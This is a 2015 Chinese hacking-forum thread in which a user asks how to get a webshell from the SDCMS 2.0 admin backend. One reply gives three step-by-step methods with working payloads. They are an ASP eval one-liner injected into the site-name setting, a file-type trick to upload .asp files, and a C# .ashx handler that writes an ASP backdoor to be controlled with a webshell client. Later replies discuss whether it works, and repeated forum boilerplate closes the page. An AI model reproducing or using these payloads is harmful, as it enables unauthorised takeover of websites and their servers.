SDCMS 2.0 后台怎么拿shell？？有人公开了！！

kyalin · 发表于 2015-7-19 17:41:16

谁能实战拿下shell 求方法！！！

链接地址和后台密码

游客，如果您要查看本帖隐藏内容请回复

红盟小渣 · 发表于 2015-7-19 17:52:43

第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
第二种方法：
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！注：修改文件类型后不能重复点保存！

第三种方法：
进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容：
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马密码为xxx 用菜刀链接

你自己试下

kyalin · 发表于 2015-7-19 18:05:55

红盟小渣发表于 2015-7-19 17:52
第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为 "%> ...

没有用旧版的才有用

可元 · 发表于 2015-7-19 18:45:41

哇塞

wuyan · 发表于 2015-7-19 19:22:48

本帖最后由 wuyan 于 2015-7-20 08:33 编辑

失败鸟

浮尘 · 发表于 2015-7-19 21:04:38

百度一下吧。。。。。。

burial001 · 发表于 2015-7-19 22:19:24

应该很简单啊啊啊啊

lksafe · 发表于 2015-7-19 23:11:52

= =什么意思还要回复。

红盟小渣 · 发表于 2015-7-20 09:16:06

那个不是可以直接上传ASP吗你找个上传点不就行了

lksafe · 发表于 2015-7-20 10:37:19

楼主。你可以联系我么。我有后台拿shell方法！

SDCMS 2.0 后台怎么拿shell？？有人公开了！！

点评

浏览过的版块

指导单位

旗下站点

联系我们

SDCMS 2.0 后台怎么拿shell？？ 有人公开了！！

点评

浏览过的版块

指导单位

旗下站点

联系我们

SDCMS 2.0 后台怎么拿shell？？有人公开了！！